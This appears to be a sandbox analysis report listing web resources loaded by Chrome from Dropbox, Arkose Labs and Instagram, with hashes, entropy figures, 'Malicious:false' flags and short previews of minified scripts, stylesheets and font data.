                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/e_core_exception-vflsuCIe1.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="20e3a5ab-b80c-3084-894f-c0ab2faa3271")}catch(e){}}();.define(["exports","./c_lodash"],(function(e,n){"use strict";let t=new Set;if(globalThis.ensemble){const e=globalThis;e.REGISTERED_EXCEPTION_TAGS||(e.REGISTERED_EXCEPTION_TAGS=new Set),t=e.REGISTERED_EXCEPTION_TAGS}var r,o={exports:{}};r=o,function(e,n){if(e){var t={},o=e.TraceKit,c=[].slice,i="?";t.noConflict=function(){return e.TraceKit=o,t},t.wrap=function(e){return function(){try{return e.apply(this,arguments)}catch(e){throw t.report(e),e}}},t.report=function(){var n,r,o=[],i=null,s=null,u=null;function a(e,n){var r=null;if(!n||t.collectWindowErrors){for(var i in o)if(l(o,i))try{o[i].apply(null,[e].concat(c.call(arguments,2)))}catch(e){r=e}if(r)throw r}}function f(e,r,o,c,i){if(u)t.computeStackTrace.augmentStackTraceWithIn
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with very long lines (564)
                                                                        Category:downloaded
                                                                        Size (bytes):977
                                                                        Entropy (8bit):5.4580613554725375
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:BF8AD0EBD023EB27CD9FC3D854D1EBFD
                                                                        SHA1:B4E0EEA54815C7F982F07A5D285000A7989FE903
                                                                        SHA-256:A44FFA9D51E301D7BF239201BEAC17F20B5850275A43C2E51ECF21261A33A2BA
                                                                        SHA-512:D5BEAFF7CDA0626A6C6B8FA05B2E2F14D03BBFCD6BFF271DADC21F3162A4BD93ADF638751C0FF6971D2B974D6BB66A734F8B0B112BFBC5D6D38F58170B881F74
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://dropbox-api.arkoselabs.com/v2/2.10.0/enforcement.d30e43c4ac240e6ebfbe54243334842b.html
                                                                        Preview:<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta http-equiv="Content-Security-Policy" content="style-src 'self' 'nonce-d44f88f8-95ff-4a39-a42b-11062c2dc723'; default-src 'self' data: client-api.arkoselabs.com client-api.funcaptcha.com client-api.arkoselabs.cn client-api.arkose.com.cn cdn.arkoselabs.com cdn.funcaptcha.com;"><meta http-equiv="X-UA-Compatible" content="ie=edge"><style nonce="d44f88f8-95ff-4a39-a42b-11062c2dc723">html, body { margin: 0; padding: 0; height: 100%; }. * { box-sizing: border-box; }. #app { height: 100%; overflow: hidden; }</style></head><body><div id="app"></div><script type="text/javascript" id="enforcementScript" src="enforcement.d30e43c4ac240e6ebfbe54243334842b.js" crossorigin="anonymous" integrity="sha384-GDBdSHKJFh3nIz6jDf/Ttjgy68Vv8w9VkRuG2wm36Jg9Xu2OSbkVU+XRd+HmSISf" data-nonce="d44f88f8-95ff-4a39-a42b-11062c2dc723"></script></body></html>
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 46188, version 1.66
                                                                        Category:downloaded
                                                                        Size (bytes):46188
                                                                        Entropy (8bit):7.994727284862106
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:DFC5E24CBC1B134E0C00C61E84EC999A
                                                                        SHA1:D3B1A8EF1D0F6F9162986479252570525719F203
                                                                        SHA-256:B5DB3E633EC765FC01A19C06B0955D56C2503285E59D8D348D08EC34ABBFEAF3
                                                                        SHA-512:48726CB83BDD0EB6822A73734AE272286483E8AEB6E18F57E635ED9269CA3C6C62E2D900224138DAFE32A79A94C3C7694307FF413505D695A77FE602681DF27B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/fonts/paper-atlasgrotesk/AtlasGrotesk-Medium-Web-vfl38XiTL.woff2
                                                                        Preview:wOF2.......l...............B.......................&.......`..\.2..a.....\..M.....6.$..x..~.. .....|..?[....r.O.tf.$...d.wSc....=.3-=7v=.....`n.u...h.|.I........d"c.\.%i.@QU...s..b.&n.T..%J..Zj....^(....3....k.vV..{8(..M{J/.C..w<.uV....=u.2t..Y.......`...C3K.'wp.F.R....5C..2w<.N=.+...@..A..:....._....X....y.Zn....DE..`....Y*h.82....."..3YM..f.]...?..*'.".s5...#.O..P....4....;6W.U.S.....Y.CGD....v...].....&..".....9.X.d.m.g..m...3c..%b...]....<b(....h...,.v...._z........R..z23?.S.?3...Y`...e...qL...m6YJ...h....#l.........B..m.`....KDQq. s...."c9G..\e.U....5....fu...e7...n..kDM...`. 7......OB.&(.R...Y.....Ir.^......Q..V~}.!r!.J[;`.iU@Z........I8.8..b.5...e.Z%%.-t.B[.%...^..R..d....kM.LN...*T..L.a.X[.jd)...F....J.,pN..TE.v.5U.h...J#?M.[./..laM.'.HI....9.^.....|.....!5%.X... .).~=..t..T...J..!.........Ml...2.Tx......I$.yRi.R.....l.X.$..o|Oz..[i.1?l...0#.._.......)....I..Q.c......B...0.."...@.k..~)5...|[!..p..8.6.OL$.(..`.C.e3.L............[4...%
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (3427)
                                                                        Category:downloaded
                                                                        Size (bytes):3823
                                                                        Entropy (8bit):5.5176214151313845
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9803364AD324026D270DFAE6FB7D1F57
                                                                        SHA1:A40B9B27A004BEF3BBF9CA9B31870B5E546C9A04
                                                                        SHA-256:E28E6AC8C17149B07D88A08B1D61EFDAC0843762A41247F481D90BCED9E898B9
                                                                        SHA-512:EDE7906D688A2A46F52C21F6F88EC03941E296E43FAB383280951ADD3A1627961B3AE5F273B84CA0FD1FAAE7734956B2E512785FBCF2DD10BDFFD7F7E81029C6
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-content-icons_icons_file-video-small-vflmAM2St.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="cc7c7d93-dd28-32a3-ac8f-f50a37a33fa1")}catch(e){}}();.define(["exports","react","./c_dig-content-icons_hooks_useContentIconViewbox"],(function(e,t,o){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(o){if("default"!==o){var n=Object.getOwnPropertyDescriptor(e,o);Object.defineProperty(t,o,n.get?n:{enumerable:!0,get:function(){return e[o]}})}})),t.default=e,Object.freeze(t)}var l=n(t);const a=()=>l.createElement(l.Fragment,null,l.createElement("path",{d:"M21.7568 2.5H4.24324C3.19499 2.5 2.38362 2.70706 1.83172 3.11547C1.27982 3.52383 1 4.12424 1 4.9V23.1C1 23.8757 1.27982 24.4761 1.83172 24.8845C2.38355 25.2929 3.19492 25.5 4.24324 25.5H21.7568C22.805 25.5 23.6164 25.2929 24.1683 24.8845C24.7202 24.4762 25
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (744)
                                                                        Category:downloaded
                                                                        Size (bytes):798
                                                                        Entropy (8bit):4.83636828949503
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FFA4A8CEE985A798CFF48D450F8436AD
                                                                        SHA1:0584E9A89D7DCE5DA4AC9084DC91297237BB3B94
                                                                        SHA-256:45526D8DCBFAE6EE2E386F518184BC65B459B3F207FF8E82A89C8FBFABB249F4
                                                                        SHA-512:BFD66B672D26860B625F468CA615C4EAC2A3DA4F232C24C664FE546C1D7F88DD2D980D43F9D017F6D9C7D73BD5417BC00AAF4E1B4D603E60148A1A2F155C65C7
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/js/signup_signin/unified_susi/common/auth_error.module.out-vfl_6Sozu.css
                                                                        Preview:._text-input-error-wrapper_1nlfs_4,._text-input-success-wrapper_1nlfs_5{margin-top:var(--dwg-spacing__unit--0_5);order:2}._text-input-error-wrapper_1nlfs_4,._text-input-error-wrapper_1nlfs_4 span._error-message_1nlfs_11{color:var(--color__alert__text);font-size:10px;line-height:15px}._text-input-success-wrapper_1nlfs_5,._text-input-success-wrapper_1nlfs_5 span._success-message_1nlfs_18{color:var(--color__success__text);font-size:10px;line-height:15px}._text-input-error-wrapper_1nlfs_4:empty,._text-input-success-wrapper_1nlfs_5:empty{display:none}._text-input-error-wrapper_1nlfs_4:empty+._text-input-wrapper_1nlfs_29 ._password-input_1nlfs_29{margin-bottom:var(--dwg-spacing__unit--0_5,4px)}._text-input-error-hidden_1nlfs_33{font-size:0}./*# sourceMappingURL=auth_error.module.out.css.map */
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (10680)
                                                                        Category:dropped
                                                                        Size (bytes):69289
                                                                        Entropy (8bit):5.710877041043121
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:EED4D306BF2B0006D1F6D957F4AFAF5B
                                                                        SHA1:132F1B35FE38CC47F1B25610FD1CAE2FF94ED77F
                                                                        SHA-256:6B5FA16186CC93FD03CFB1AC8765CC88F30E849A495C99EDE77972EDC7114527
                                                                        SHA-512:9D4B6816724911738FB07212BB711B49119527FEE54703AEE744BE8C774962548F2149D7E2F2DA26839AA5454C998F8D86595FBD0E5A9E84E8C8538889D1A73E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:;/*FB_PKG_DELIM*/..__d("HorizonWebMqttChannel",["CurrentUser","MqttChannel","MqttEnv","MqttEnvInitializer","MqttWebConfig"],(function(a,b,c,d,e,f,g){"use strict";c("MqttEnvInitializer").initialize();function h(){var a;d("MqttEnv").setIsUserLoggedInNow(c("CurrentUser").isLoggedIn);return new(c("MqttChannel"))({appId:(a=c("MqttWebConfig")).appID,capabilities:a.capabilities,chatVisibility:!0,clientCapabilities:a.clientCapabilities,endpoint:a.endpoint,initialSubscribedTopics:a.subscribedTopics,pageId:null,phpOverride:a.hostNameOverride,pollingEndpoint:a.pollingEndpoint,userFbid:a.fbid})}var i=null;function a(){i==null&&(i=h());return i}function b(){i!=null&&(i.shutdown(),i=null)}g.getHorizonWebMqttChannelInstance=a;g.shutdownAndClear=b}),98);.__d("MultiwaySharedTypes",["$InternalEnum"],(function(a,b,c,d,e,f){"use strict";c=(a=b("$InternalEnum"))({UNKNOWN:0,SFU:1,P2P:2});d=a({UNKNOWN:0,GROUP:1,IGVIDEOCALL:9,ROOM:15,DEBUGTOOL:16,CRUCIBLE:20,MBS_WA:21,BOT:22});f=a({OFFER:0,PRANSWER:1,ANSWER:2
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2602)
                                                                        Category:downloaded
                                                                        Size (bytes):2603
                                                                        Entropy (8bit):4.832188065876641
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1C79239764C3FAB45CFCD7D07C9701C1
                                                                        SHA1:2AA037EC6CAF51EF6941F93A0A60DD4A04F78190
                                                                        SHA-256:E5D2F57F186D5650DD607E4D52B5A80CC6286B923ABB6063C0817008576EE2C7
                                                                        SHA-512:E6FBA640A6AABBCDFE9075671DA6C22E26708573B85BA702D8DC6930DF03B0567E16011F51B1082234C2B2DE4702A75F920884D48BA144520174FC83E7495276
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/account_menu_v2-vflHHkjl2.css
                                                                        Preview:.account-menu-v2__tooltip{word-break:break-all}.account-menu-v2__avatar-button{height:auto !important;line-height:auto !important}.account-menu-v2__avatar-button span{box-shadow:none !important}.account-menu-v2__avatar-button:focus .account-menu-v2__avatar{box-shadow:var(--dig-utilities__boxshadow__focus-ring)}.js-focus-visible .account-menu-v2__avatar-button:focus:not(.focus-visible) .account-menu-v2__avatar{box-shadow:none}.account-menu-v2__avatar-header{margin-top:0 !important}.account-menu-v2__content>div{width:270px}.account-menu-v2__user-summary{display:flex;flex-direction:column;margin-top:calc(0.75 * var(--spacing__base_unit));margin-left:calc(2 * var(--spacing__base_unit));margin-right:calc(2 * var(--spacing__base_unit))}.account-menu-v2__user-summary .account-menu-v2__quota-bar-btn{display:block;margin-top:var(--spacing__base_unit);margin-bottom:var(--spacing__base_unit)}.account-menu-v2__user-summary .account-menu-v2_quota-bar-btn-container{width:-webkit-max-content;width:ma
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1744)
                                                                        Category:downloaded
                                                                        Size (bytes):2139
                                                                        Entropy (8bit):5.327319537620642
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:92757BB7B5D98BBE5437C60CBB45F373
                                                                        SHA1:B4ADC128801DFD41F8FEFD846BF935DBF65F9F7C
                                                                        SHA-256:6E709B6D14DE7D217168E95CE71FA880C5EB88496D018F079829F356ED6B864B
                                                                        SHA-512:38312DE7A168492CD3D1843142C03A97F06BA2B1E6C8F7131E57EF43038732DE81491AD72ED56DCC152E56A86BD998EBC33E0768A31720A17D86E27FEC5082C0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_thumbs-up-vflknV7t7.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="b6047359-8897-378f-8b50-af50786d41c9")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var l=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,l.get?l:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var l=r(t);e.ThumbsDownLine=e=>l.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},l.createElement("path",{d:"m18.988 11.416-.821-4.463A2.257 2.257 0 0 0 15.937 5H10.34c-.505 0-1.002.118-1.454.343L5 7.287V14h2.058c.317 0 .628.087.9.25l1.373.825a.745.745 0 0 1 .342.46l.992 3.965h1.09a3.249 3.249 0 0 0 3.2-3.832L14.65 14h2.1a2.26 2.26 0 0 0 2.238-2.584Zm-1.66.822a.768.768 0 0 1-.578.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (665)
                                                                        Category:downloaded
                                                                        Size (bytes):666
                                                                        Entropy (8bit):4.837004615391955
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A0EF15CB4F52D5F152A361C4A4208C73
                                                                        SHA1:62E8A6612C09E571E1266353758F61DC379401B0
                                                                        SHA-256:7EB159511D44A621FB5DC9FF210E67E3621EC4000806F3D9255920F8A7B3DBF6
                                                                        SHA-512:AA68B22A2003B7EAA605BC3D710103459D68901BCB03E65528ADCB2A5C01018EF8370FD4F7D82E707FD8B9C58441FD395605A33AFBE45AADFD21C1AAE6648ACF
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/components/tooltip-vfloO8Vy0.css
                                                                        Preview:.tooltip-wrapper{display:inline-block;position:relative}.tooltip-wrapper .tooltip-prompt{position:relative}.tooltip-wrapper .tooltip-prompt .sprite{cursor:pointer}.tooltip-wrapper .tooltip-prompt .sprite:focus{box-shadow:0 0 0 3px #428bff;border-radius:3px}.tooltip-bubble{display:none;font-size:13px;line-height:normal;position:absolute;background:#fff;background-clip:padding-box;border:1px solid rgba(61,70,77,0.1);cursor:default;padding:9px 15px;z-index:9999;border-radius:3px;box-shadow:0px 1px 2px rgba(0,0,0,0.1)}.tooltip-bubble .tooltip-inner{position:relative}.tooltip-bubble ul li{list-style-position:outside;margin-left:2em}.tooltip-target{display:table}.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 1637765
                                                                        Category:downloaded
                                                                        Size (bytes):224148
                                                                        Entropy (8bit):7.997992818017991
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:3620FD64C4299D1ED222EDFE2765C8EC
                                                                        SHA1:72428C6FC7889C2FE6E1B4A1DFA71727BD806B12
                                                                        SHA-256:9C8330364A702616E8AF6E2F4044C7226ED639416E7DF9198191F79F86C8A523
                                                                        SHA-512:E70C088002E6BD14245F3BBB99F424C2A3A13F17ECC866D6010D8F34634D93384EA868AC7487AD71A3E90F887E7BC727025582197853CD5C8A9FD8E0D9C01B05
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/webpack/production/pifs.0d955c1301c052becfee3e6ea8cb3f0c.qk57ZXWGaObpaaK3MAil-OiWdswdcFt_G8hQEuNLGe4.css.gz
                                                                        Preview:.............8r(.._A...*[.(2..i.m4.....I..cZI66. ...d.\.Q..a...._._......./..V.tu..8...;.pw|*. |.S...v..."....fIV.>....c.DQ.>.v......3'...}../.{..O..4s>.N...cVD.p. ...a.......=s...).$......)K+...B....>.dE..A~8.(xv.oZ..\....,-.$(g... .f..>...9......Y..!RF..*........t.YUe..\e.U\%.FP{A..:l=O...._%.. -....I.t^....{C..J+....f.%Hd..kU.n....t.....*......./..$.$.Kt..y|...|.=......,Q.%.c.^+7H..P.R.O]z .Yg..jxi..z....r.+....1.*TV..3.~...U)...!.u..}C.).^..8.PJ.^..$..2..a.U.v..4/Q..QP..O..v.[<<^..)N1...FF.o...J+7A.P..7..M.:,=..9(.0Kq..<.Sy..=.....p...r.s.D*.G.(g.'......]....r...>b\.3...."y<g.......3g.ol.........?...?.....#.a..Np..f...Ln..;...<f.ny..........)....oF.7_.".']X.o.v+........*..TD.[^L.....c..y#...:.i......f&..P.E.$.P.S.D9..W.Rx.}.>.QZ..EdeIK.Y..LyV.X7..c.%.J.u.U..V...?...^................n<.x& .<.8D=%.:1v]..^d....*f..O..=a.]+7..kN.....9.u...R.....c4....Q..t~\<7.9. 7...[..y...QL..9...)*n...z..G............6da.N..K=..#...Q.8.....J......(..'/..UP..;...q
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 85096, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):85096
                                                                        Entropy (8bit):7.997143828952949
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:95E97662A93CAE50B0DAB432DF119AEA
                                                                        SHA1:8D2582583203248D7E7091643B206B41670F06B4
                                                                        SHA-256:7DDBB15E310036B76C1DABC3D596A153E74FEEA6EF999152A68264A37DF173B4
                                                                        SHA-512:D51AF73C37F0500C9EAAF67E38C6ED47D658862F59C776960BA8C9D7977FCE65BC2793FCE79D0BCC2F06E205F9DAF1E414E6C298C5C12B2C43F4919F5C7DA965
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/fonts/AtlasGrotesk-Medium-190618-Web.woff2
                                                                        Preview:wOF2......Lh......-...L............................*..d.`....<..s.....8..{..h..6.$..d. ..L.....Z[)........$j....1..!&.T.V..........o".t..@....g.H1..}.a.....@.f..........d....v....J.....w.G....L....cr/0....yO..2....>.(..2..Vi.R.,..&..|.e!`\m..3Kh.R.d...B.,....h.....Y.t..d.n.....R}...;1.'$.:NP../X=....s...:.N.........#..e..R.yw(4......&vJiDo.EH.jcv..3...lh...%..*{.J.p?.L....L....[T.T...+.].$...."/.R...t].T.B.v.lo..]...ke.7X\..'...pbG.s.B.".Y...\.^..+.....@.................W......S?..E.oo..O..._..T.(`."P.8_3{a..7..$.....#.9..@..?......w.f....'..L..#..8..................r....t.q.W7.h.P~......mnT=H3x....E.fHU...eF@.q.>D.&..ZzWb....FM...-.......=$.D.8....+{_.J%(...R................!...d..>.N...s.....)@.[6..S....^.J..NA%KN.$.p.......7.m7.d..4.4.0..w.S..\.{.{@..#..f..V...=.....^..}]J..G3.O..YICS....7.....f..2..u.....x.G.5$V..u..Di.:.............07k.....L...Y.8K0..U. ..g..-..).."..lS.UX...o...;..V..2.D'.b!V.a..`#.511..1......t.ElJ.`J...Mx.M.b.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:1
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 82560, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):82560
                                                                        Entropy (8bit):7.9969346853325245
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:3777CF6535DB972DF634D4CB16895797
                                                                        SHA1:C82654E2FE488D321F3CE0FA494F846530E25875
                                                                        SHA-256:1F8D64D90C3DF5741AE4A60E80AE4A2CDCB7D212B12AA9A822F18FBF93FD2AB3
                                                                        SHA-512:428C278A5901CBA420E354D5BC6B55DE45F47F78E5C28508487D7A250DCA28C3AEFDDB998B2FD26C9E4750E8F11B6DD35648897D718896317D3BF87FA3ABC3EA
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/fonts/AtlasGrotesk-RegularItalic-190618-Web.woff2
                                                                        Preview:wOF2......B........x..B............................h..d.`.......s...........4..6.$..d. ........l[.g..Sd.....v.F..O..z....).H.!...Y.E.%c....c-$..!.sl.!....3.........gM......Z+.X.V...]B.y..b..B..5m../...!_V....7.{@...S..].2.m;5Yv.M... ..=I......U.K......":.W........].S..(...xI...q..X...Z.| ..@...).o..+5Mz.ks.,...t.....!.3.'I....>...2j.R.|....e..cp=.....p..m.;h..Y. Y0.....K......I.!{.....R..%..:.A.e..".........=..(...9=.EJ.R.0.)%.Z....~...qV..D.r|...6.M.%.....\...Twx..>....|j/mdi..../.F.....b{....{..........61x...'.v.u. .....Zy{.}Rc..2.....Z.....m.*...a`Uf.P...n?...A.!]L......3(TMn..b...N.&<P^..-.-.%R.S1.'.|>..._.g..{.,.l...4g...T@Y....b./..,a.....O......v.....Eo.Ce......&...Q1....y.h._W...p.5m..,.q<....I.s..&...!.T<M.].f_&....<":..P..`.....iV].'......F%...@.t..I.|zA......"C..,}!....K...@eH.lo.k.+' .._8.ri.@.....')!!!))%)-%-##+++.v..*.................=8Y9y||..[.g...N.......,...w.>E.*...../...6.....$../...........-];H.>.7*.....0...T...R.....*.S.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (13304)
                                                                        Category:downloaded
                                                                        Size (bytes):865345
                                                                        Entropy (8bit):5.363026165624304
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:CC37DFA01CB5CE78F4CC6FF2F9681E49
                                                                        SHA1:27034C900D98A838C35EFDDA53401F0A4643E1D9
                                                                        SHA-256:FE61632FF3D451D6B16B4A68A5D1BF0921E3642F4BF506F14B7B78F6ABBD00C6
                                                                        SHA-512:E676CF6C22BA2A8BE2EDCA5C0AF9797E7FFC9CC418B548D6AA30CEB69743DDF82BB0FAF4E68E86FA69CA90567A716ABD1292EECF14A11421B6D7D9970FB9386B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://static.cdninstagram.com/rsrc.php/v3/yQ/l/0,cross/TLB-IUxSyhTcyf8QhNEWE-MbVu6J6TSgC.css?_nc_x=Ij3Wp8lg5Kz"
                                                                        Preview:._9dls{overflow-y:scroll!important}._9t1d{overflow-y:auto!important}._9dls ._6s5d{overflow-y:visible!important}._6s5d{background-color:var(--web-wash);-webkit-font-smoothing:antialiased;overscroll-behavior-y:none}@media (prefers-reduced-motion: reduce){._6s5d :not(.always-enable-animations){animation-duration:0!important;animation-name:none!important;transition-duration:0!important;transition-property:none!important}}._8ykn :not(.always-enable-animations){animation-duration:0!important;animation-name:none!important;transition-duration:0!important;transition-property:none!important}.._a6hd._a6hd,._a6hd._a6hd:hover{text-decoration:none}.._ab1y{color:rgb(var(--ig-primary-text));display:flex;flex-direction:column;flex-grow:1;justify-content:center;margin-top:12px;max-width:350px}._ab1z{margin:0;max-width:unset;width:100%}._ab1-{padding-bottom:60px}._ab1_{padding-top:100px}._ab25{color:rgb(var(--ig-primary-text));font-size:14px;margin:15px;text-align:center}._ab26{color:rgb(var(--ig-seconda
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1649)
                                                                        Category:downloaded
                                                                        Size (bytes):2689
                                                                        Entropy (8bit):4.880852250421968
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:25057071D4079DEB15A0571DC8CDA36C
                                                                        SHA1:02980965AF483DFA6A59DAC2B935E22030B99C9B
                                                                        SHA-256:0042C340345C05241045EAFF678E9D8DE05116DB7A0BE793B7E02673C6DD9BE9
                                                                        SHA-512:E265CE5774DFCFFB99D57C12C68444828DF41C4DC26714386FDA145980B01776DBAE28B2FD72394717343E999991BC0F88FC1D3416EC0F12B4EC0746D511E333
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/typescript/component_libraries/pro-ui/src/index.web-vflJQVwcd.css
                                                                        Preview:./* -- typescript/component_libraries/pro-ui/src/components/branding/background/index.web.css */..branding-background{height:100%;overflow:hidden;position:relative;width:100%}.branding-background-thumbnail{display:inline-block;height:36px;width:36px}.branding-background--image,.branding-background-thumbnail{background-position:50%;background-repeat:no-repeat;background-size:cover}.branding-background__video{height:400%;left:0;position:absolute;top:-150%;width:100%}./* -- typescript/component_libraries/pro-ui/src/components/branding/branding_block/index.web.css */.:root{--branding-folder-preview-height:220px}.branding-folder-preview{align-items:center;background-size:cover;display:flex;height:var(--branding-folder-preview-height);justify-content:center;overflow:hidden;position:relative}.branding-folder-logo{max-height:100%;max-width:var(--branding-folder-preview-height)}.video{height:100%;object-fit:cover;position:absolute;width:100%}./* -- typescript/component_libraries/pro-ui/src/comp
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):75729
                                                                        Entropy (8bit):5.397022333878513
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:99E7F9BC9012DC8E4AB28F1EB5988C53
                                                                        SHA1:5E4F03C06F347932A40A7E9CF53B734DEA2CDAF1
                                                                        SHA-256:5FF96FD2CA3471D57C6BB869FF019A7ADF2A2DE4EB7AA2A623CFD34FE17BAB80
                                                                        SHA-512:32D9BDD0E5FB0AD165C4D5C96780682BDCDE633ACB900E556156020325452318560FDF052287C47F29201C61F8B1608736E508B1F289F6A713C07532C275B752
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:var arkoseLabsClientApia8a40d09;!function(){var e={7983:function(e,t){"use strict";t.N=void 0;var n=/^([^\w]*)(javascript|data|vbscript)/im,r=/&#(\w+)(^\w|;)?/g,o=/&tab;/gi,i=/[\u0000-\u001F\u007F-\u009F\u2000-\u200D\uFEFF]/gim,a=/^.+(:|&colon;)/gim,c=[".","/"];t.N=function(e){var t,s=(t=e||"",(t=t.replace(o,"&#9;")).replace(r,(function(e,t){return String.fromCharCode(t)}))).replace(i,"").trim();if(!s)return"about:blank";if(function(e){return c.indexOf(e[0])>-1}(s))return s;var u=s.match(a);if(!u)return s;var l=u[0];return n.test(l)?"about:blank":s}},3940:function(e,t){var n;!function(){"use strict";var r={}.hasOwnProperty;function o(){for(var e=[],t=0;t<arguments.length;t++){var n=arguments[t];if(n){var i=typeof n;if("string"===i||"number"===i)e.push(n);else if(Array.isArray(n)){if(n.length){var a=o.apply(null,n);a&&e.push(a)}}else if("object"===i)if(n.toString===Object.prototype.toString)for(var c in n)r.call(n,c)&&n[c]&&e.push(c);else e.push(n.toString())}}return e.join(" ")}e.expor
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (6977)
                                                                        Category:downloaded
                                                                        Size (bytes):6978
                                                                        Entropy (8bit):4.831974926409326
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D8D742D50E72BE3B93DD10E6631622B3
                                                                        SHA1:9F795BC4B8CD7A9D68346F37CA5682A6DB4CAD2C
                                                                        SHA-256:4CBB94D3E941FA9B755F9FD99CE2F2CCA12B62AFF0903AF8754D43649AEF65C0
